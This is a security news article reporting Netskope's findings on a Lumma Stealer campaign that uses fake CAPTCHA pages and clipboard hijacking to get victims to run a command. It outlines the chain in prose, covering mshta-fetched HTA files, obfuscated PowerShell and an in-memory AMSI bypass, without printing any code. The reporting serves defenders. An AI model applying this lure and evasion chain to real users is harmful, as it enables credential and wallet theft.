
Example of the malicious command in the Run window | Source: Netskope
A new malware campaign leveraging the Lumma Stealer malware-as-a-service (MaaS) model has been uncovered by Netskope Threat Labs. This campaign, which began in January 2024, employs social engineering techniques such as fake CAPTCHA pages to deceive victims into downloading and executing malware outside their browsers, bypassing traditional security defenses. According to the report, this campaign spans multiple industries and regions, targeting victims in the U.S., Argentina, Colombia, the Philippines, and more.
The report highlights several advanced techniques and findings:
- Fake CAPTCHA social engineering: The campaign uses CAPTCHA-like interfaces to trick victims into executing malicious commands. Netskope researchers noted, “The fake CAPTCHA is an exceptionally creative piece of social engineering designed to trick the victim into downloading and executing malware outside the browser.”
- Clipboard hijacking: Victims are instructed to copy and execute a command via the Windows Run window (Win+R), bypassing browser-based security controls.
- Evasion via LOLBins: The malware utilizes legitimate Windows tools like mshta.exe to download and execute malicious HTA files, making detection more difficult.

The infection chain starts when victims visit a malicious website displaying a fake CAPTCHA. This CAPTCHA prompts them to open the Windows Run window, paste a preloaded command from their clipboard, and execute it. The malicious command downloads an HTA file, which uses PowerShell to decode and execute obfuscated scripts, ultimately delivering the Lumma Stealer payload.
“Downloading malware payloads outside the browser serves an anti-analysis mechanism, evading browser-based cybersecurity controls,” the report emphasizes.
To avoid detection, the malware employs sophisticated techniques, including:
- AMSI bypass: By modifying the “clr.dll” module in memory, the malware prevents Windows Antimalware Scan Interface (AMSI) from scanning its final payload.
- Obfuscation layers: The infection process involves multiple layers of obfuscated PowerShell scripts. The final step decodes and executes the Lumma Stealer payload using reflection.
“The AMSI bypass code appears to be a copy of an open source implementation,” the researchers noted, pointing to the increasing reliance of attackers on open-source tools to refine their evasion techniques.
This campaign has affected a wide range of sectors, including healthcare, banking, marketing, and telecommunications—the latter being the most targeted industry. The Lumma Stealer malware, which has been active since at least 2022, is designed to exfiltrate sensitive data such as passwords, cookies, and cryptocurrency wallets.
Related Posts:
- MaaS in Action: How Lumma Stealer Employs Advanced Delivery Techniques
- ThreatMon Revealed APT41’s Stealthy PowerShell Backdoor
- LUMMA Malware: Cybercriminals Elevate Tactics with Fake Invoice Campaign
- Clipboard security issues found in Chromium, Firefox, and Apple Safari browsers
- Cybercriminals Turn Discord into Malware Playground with Lumma Stealer